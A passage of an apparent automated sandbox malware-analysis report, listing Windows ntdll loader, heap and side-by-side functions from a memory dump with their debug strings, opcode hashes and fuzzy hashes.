                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T$`V${
                                                                                                                                                                            • API String ID: 0-2184846227
                                                                                                                                                                            • Opcode ID: a7d97dced9fd57144cd630d202e2ed2ea50073b6f17036380cc6a6a9fd110580
                                                                                                                                                                            • Instruction ID: 5fe0e9929b1b1fd1beca7651d09a239b49d8e9616db379f38d62c5ef909adc84
                                                                                                                                                                            • Opcode Fuzzy Hash: a7d97dced9fd57144cd630d202e2ed2ea50073b6f17036380cc6a6a9fd110580
                                                                                                                                                                            • Instruction Fuzzy Hash: 26A23774E056298FDB64DF18CC887A9B7B5EF45314F2442EAD809A7391DB34AE82DF00
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00F589B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            • VerifierDlls, xrefs: 00F58CBD
                                                                                                                                                                            • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 00F58A67
                                                                                                                                                                            • HandleTraces, xrefs: 00F58C8F
                                                                                                                                                                            • AVRF: -*- final list of providers -*- , xrefs: 00F58B8F
                                                                                                                                                                            • VerifierFlags, xrefs: 00F58C50
                                                                                                                                                                            • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 00F58A3D
                                                                                                                                                                            • VerifierDebug, xrefs: 00F58CA5
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                                                                            • API String ID: 0-3223716464
                                                                                                                                                                            • Opcode ID: bc94a09adfde278cf43ce272cc138528ee441ca1d9000aa7317675cd0d9aa096
                                                                                                                                                                            • Instruction ID: 0039ce471914b555faaa8e52edb455c938bf21691d93ba0a7cc13c45136623ad
                                                                                                                                                                            • Opcode Fuzzy Hash: bc94a09adfde278cf43ce272cc138528ee441ca1d9000aa7317675cd0d9aa096
                                                                                                                                                                            • Instruction Fuzzy Hash: 6A912672A05715EFD311DF288D82F5A77E8AB84B61F040458FE417B292DB74AC0AF791
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00F063FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                                                            • API String ID: 0-792281065
                                                                                                                                                                            • Opcode ID: 8da2681db6d5a51d998808affce83cead64a3dd17082b0c62c7324cf0417e58a
                                                                                                                                                                            • Instruction ID: ab5d8b2dfb903f8d273f524ca8f104bbe16b674afc76613e67b718b21434a14d
                                                                                                                                                                            • Opcode Fuzzy Hash: 8da2681db6d5a51d998808affce83cead64a3dd17082b0c62c7324cf0417e58a
                                                                                                                                                                            • Instruction Fuzzy Hash: 5F916671E047199BDB24DF14ED46FAA7BA0AF41B24F140129FD01BB2D1DBB8A841F791
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00EC645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 00F29A2A
                                                                                                                                                                            • Getting the shim engine exports failed with status 0x%08lx, xrefs: 00F29A01
                                                                                                                                                                            • LdrpInitShimEngine, xrefs: 00F299F4, 00F29A07, 00F29A30
                                                                                                                                                                            • apphelp.dll, xrefs: 00EC6496
                                                                                                                                                                            • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 00F299ED
                                                                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 00F29A11, 00F29A3A
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                            • API String ID: 0-204845295
                                                                                                                                                                            • Opcode ID: 3ae30450a9a0abc610678dc83237a248df8a351dc0554f418a517d7974b24847
                                                                                                                                                                            • Instruction ID: 45af47287966b7730d8e2f981ddca0e6d190af417d17cf075de7b8350a7d497a
                                                                                                                                                                            • Opcode Fuzzy Hash: 3ae30450a9a0abc610678dc83237a248df8a351dc0554f418a517d7974b24847
                                                                                                                                                                            • Instruction Fuzzy Hash: E651DB7160C3049BD320DB20ED82FABB7E8AF84754F10191EF585AB1A1DA70E905AB92
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00F0C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            • LdrpInitializeProcess, xrefs: 00F0C6C4
                                                                                                                                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 00F48181, 00F481F5
                                                                                                                                                                            • Unable to build import redirection Table, Status = 0x%x, xrefs: 00F481E5
                                                                                                                                                                            • Loading import redirection DLL: '%wZ', xrefs: 00F48170
                                                                                                                                                                            • LdrpInitializeImportRedirection, xrefs: 00F48177, 00F481EB
                                                                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 00F0C6C3
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                            • API String ID: 0-475462383
                                                                                                                                                                            • Opcode ID: 2cba5caf94bef3f59b9a2401dc644f189588987381ee52c55de81e93cb3d4d54
                                                                                                                                                                            • Instruction ID: 092405b8433f9e33755b3b4cdcaf165bdda543225ffb969a064dcc2b96f67e81
                                                                                                                                                                            • Opcode Fuzzy Hash: 2cba5caf94bef3f59b9a2401dc644f189588987381ee52c55de81e93cb3d4d54
                                                                                                                                                                            • Instruction Fuzzy Hash: 95312571B483459BC320EF28DD47E2BB7D4EF84B50F010558F984AB2D2DA20ED05E7A2
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00F02674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 00F42180
                                                                                                                                                                            • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 00F4219F
                                                                                                                                                                            • SXS: %s() passed the empty activation context, xrefs: 00F42165
                                                                                                                                                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 00F421BF
                                                                                                                                                                            • RtlGetAssemblyStorageRoot, xrefs: 00F42160, 00F4219A, 00F421BA
                                                                                                                                                                            • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 00F42178
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                                                            • API String ID: 0-861424205
                                                                                                                                                                            • Opcode ID: 9f9a3a43a5c7c39418072e05694bba9483e918519b2b5532550fdf37b55dfc0f
                                                                                                                                                                            • Instruction ID: 166fe89c24b7bce68342b5c99b0299dfe72e22edf334aad82e6a16a62c0f4acf
                                                                                                                                                                            • Opcode Fuzzy Hash: 9f9a3a43a5c7c39418072e05694bba9483e918519b2b5532550fdf37b55dfc0f
                                                                                                                                                                            • Instruction Fuzzy Hash: 8431E532F4032477E7618A958C89F9F7A68DBD5B90F054069BE05B7281D6709E01F6A1
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00F1096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00F12DF0: LdrInitializeThunk.NTDLL ref: 00F12DFA
                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F10BA3
                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F10BB6
                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F10D60
                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F10D74
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1404860816-0
                                                                                                                                                                            • Opcode ID: f277bbae4132ffe95c21a9d0c1ed01854711fca15810e451033a7dd3779898e8
                                                                                                                                                                            • Instruction ID: b13acd1381936278e89cd959c5553a8587eba11a1ee1f536177dd4c8377bda43
                                                                                                                                                                            • Opcode Fuzzy Hash: f277bbae4132ffe95c21a9d0c1ed01854711fca15810e451033a7dd3779898e8
                                                                                                                                                                            • Instruction Fuzzy Hash: 07426C71A00715DFDB20CF64C841BEABBF5BF44310F1485A9E999EB241DBB4AA84DF60
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00EDA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                                                            • API String ID: 0-379654539
                                                                                                                                                                            • Opcode ID: f84eecd6ef586d6cbf20c31bed3d1d415715e10f4d9f6edff6bd2b5dc1f62284
                                                                                                                                                                            • Instruction ID: ebb82990ef3ce1f7472cdc7457b9e50a067b6b2876b018bf42524e710b4f3b73
                                                                                                                                                                            • Opcode Fuzzy Hash: f84eecd6ef586d6cbf20c31bed3d1d415715e10f4d9f6edff6bd2b5dc1f62284
                                                                                                                                                                            • Instruction Fuzzy Hash: 32C16775508382CFC711DF18C044BAAB7E4EF84714F08996AF895AB351E774CA4ADB53
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00F08402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            • LdrpInitializeProcess, xrefs: 00F08422
                                                                                                                                                                            • @, xrefs: 00F08591
                                                                                                                                                                            • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 00F0855E
                                                                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 00F08421
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                                                            • API String ID: 0-1918872054
                                                                                                                                                                            • Opcode ID: 4683dcce78165e6cf8c878c598a01f73fd8b669d4ef2c755bcb3c4f80bc59ead
                                                                                                                                                                            • Instruction ID: 67bfe6b56cea3220d67124dddc20d3fc36dbb77cd394031dcba8f88cd5597836
                                                                                                                                                                            • Opcode Fuzzy Hash: 4683dcce78165e6cf8c878c598a01f73fd8b669d4ef2c755bcb3c4f80bc59ead
                                                                                                                                                                            • Instruction Fuzzy Hash: E691C071508744AFD720EF60CC41FABBBE8BF84794F44092EFA8496191E734D945EB62
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00F0273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            • .Local, xrefs: 00F028D8
                                                                                                                                                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 00F422B6
                                                                                                                                                                            • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 00F421D9, 00F422B1
                                                                                                                                                                            • SXS: %s() passed the empty activation context, xrefs: 00F421DE
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                                                            • API String ID: 0-1239276146
                                                                                                                                                                            • Opcode ID: 927c8eed6986ea6b7cfad940f898f6fcc76aa58eaf796e01ae8f4cffa6ac828a
                                                                                                                                                                            • Instruction ID: 49b90f96d79940ff60cb7f25d5221217e407b934a70a3ea38fafa6a99b170a69
                                                                                                                                                                            • Opcode Fuzzy Hash: 927c8eed6986ea6b7cfad940f898f6fcc76aa58eaf796e01ae8f4cffa6ac828a
                                                                                                                                                                            • Instruction Fuzzy Hash: 8EA1A435D01229DBDB64CF54CC88BA9B3B5BF58314F2541EAE848A7291D7709E81FFA0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00F04AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 00F43456
                                                                                                                                                                            • RtlDeactivateActivationContext, xrefs: 00F43425, 00F43432, 00F43451
                                                                                                                                                                            • SXS: %s() called with invalid flags 0x%08lx, xrefs: 00F4342A
                                                                                                                                                                            • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 00F43437
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                                                                                            • API String ID: 0-1245972979
                                                                                                                                                                            • Opcode ID: e8739df69eb56f265446bf3e6d50e6829f21bbb7674b249d37bd2ba974927552
                                                                                                                                                                            • Instruction ID: 95219045bc23507d76d8a52118430d7e80915dc08d93e6a300de5abe60f6351c
                                                                                                                                                                            • Opcode Fuzzy Hash: e8739df69eb56f265446bf3e6d50e6829f21bbb7674b249d37bd2ba974927552
                                                                                                                                                                            • Instruction Fuzzy Hash: 9C6136B2A40B119BD722CF18C842B6AB7E5EF90B60F148529FD55AB291C734FD01FB91
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00ED64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 00F30FE5
                                                                                                                                                                            • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 00F310AE
                                                                                                                                                                            • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 00F31028
                                                                                                                                                                            • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 00F3106B
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                                                                            • API String ID: 0-1468400865
                                                                                                                                                                            • Opcode ID: fef4fcbe6bc727441bc370177dd6e06e59c699b90f29c0386fe097f8d426397e
                                                                                                                                                                            • Instruction ID: ff16892715982f91c07a6fd24f24e889f1f24da43e21781c7271c9407b0aead7
                                                                                                                                                                            • Opcode Fuzzy Hash: fef4fcbe6bc727441bc370177dd6e06e59c699b90f29c0386fe097f8d426397e
                                                                                                                                                                            • Instruction Fuzzy Hash: 8971E1B19043049FCB20DF64D885F977BA8EF94764F00086AF9499B286D738D5CADBD2
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00EF245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            • LdrpDynamicShimModule, xrefs: 00F3A998
                                                                                                                                                                            • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 00F3A992
                                                                                                                                                                            • TG, xrefs: 00EF2462
                                                                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 00F3A9A2
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$TG$minkernel\ntdll\ldrinit.c
                                                                                                                                                                            • API String ID: 0-2078120800
                                                                                                                                                                            • Opcode ID: 6f65b4ccd8004721e68fed7aa20c72abbfca96e8b274819dfc68b33042ad8f02
                                                                                                                                                                            • Instruction ID: d6fda2811716e96275d0679464163ced0367258d8d8020a5adb17de7329d6ff4
                                                                                                                                                                            • Opcode Fuzzy Hash: 6f65b4ccd8004721e68fed7aa20c72abbfca96e8b274819dfc68b33042ad8f02
                                                                                                                                                                            • Instruction Fuzzy Hash: 4B317B32A00205EBCB209F59DE46FAAB7B4FF80B24F264019F951B72A0C7B49D41F742
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00EE29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            • HEAP: , xrefs: 00EE3264
                                                                                                                                                                            • HEAP[%wZ]: , xrefs: 00EE3255
                                                                                                                                                                            • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 00EE327D
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                                                                            • API String ID: 0-617086771
                                                                                                                                                                            • Opcode ID: dcac076f3a3642e08393ad1f0547511afb538f6b0bddca770185cad61b73d9dd
                                                                                                                                                                            • Instruction ID: e06babf26f6a81d11b756f037a0613611ad069d1910643571833f1e0604c474e
                                                                                                                                                                            • Opcode Fuzzy Hash: dcac076f3a3642e08393ad1f0547511afb538f6b0bddca770185cad61b73d9dd
                                                                                                                                                                            • Instruction Fuzzy Hash: 4A92CC71A042889FDB25CF6AC444BAEBBF1FF48304F18906DE959BB392D734A941DB50
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00EE0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                            • API String ID: 0-4253913091
                                                                                                                                                                            • Opcode ID: c3b3c2127bd844b735b2f558e62dec5a4d5dc3f0a7ab3ebb9ac3a0b03f7ca202
                                                                                                                                                                            • Instruction ID: 141f46915eb2ae4fe3601dd98d2fa0e900f9be3855152fd1d5befa600ce75e4d
                                                                                                                                                                            • Opcode Fuzzy Hash: c3b3c2127bd844b735b2f558e62dec5a4d5dc3f0a7ab3ebb9ac3a0b03f7ca202
                                                                                                                                                                            • Instruction Fuzzy Hash: 5BF1CF30A00A49DFDB24DF69C894BAAB7F5FF84714F244168E406AB392D774ED81DB90
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00EF6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: $@
                                                                                                                                                                            • API String ID: 0-1077428164
                                                                                                                                                                            • Opcode ID: 43333a161d625217feb48054d30e9191e091503d178786c3aca6d2b046dc7582
                                                                                                                                                                            • Instruction ID: 124a719aeb96c8fd47e2781e2cf18c0faa0332a1c81ce160486bb4be75877ce6
                                                                                                                                                                            • Opcode Fuzzy Hash: 43333a161d625217feb48054d30e9191e091503d178786c3aca6d2b046dc7582
                                                                                                                                                                            • Instruction Fuzzy Hash: ECC28B71A083459FDB25CF24C881BABBBE5AF88714F14992DFAC9E7241D734D804DB92
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00ECA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                                                            • API String ID: 0-2779062949
                                                                                                                                                                            • Opcode ID: 3c0a3de693127899929f80e198d1578d4ebdabb93e124c0444547f3424a9b3ef
                                                                                                                                                                            • Instruction ID: f9942bb4dfaac3c94df48e4e16c3e5361e9333b5dda03391a73ab2692d4475d0
                                                                                                                                                                            • Opcode Fuzzy Hash: 3c0a3de693127899929f80e198d1578d4ebdabb93e124c0444547f3424a9b3ef
                                                                                                                                                                            • Instruction Fuzzy Hash: 5EA188729002389BDB20DF64DC89BEEB7B8EF48714F1041EAE908A7250D7359E84DF90
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00EF0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            • Failed to allocated memory for shimmed module list, xrefs: 00F3A10F
                                                                                                                                                                            • LdrpCheckModule, xrefs: 00F3A117
                                                                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 00F3A121
                                                                                                                                                                            Memory Dump Source
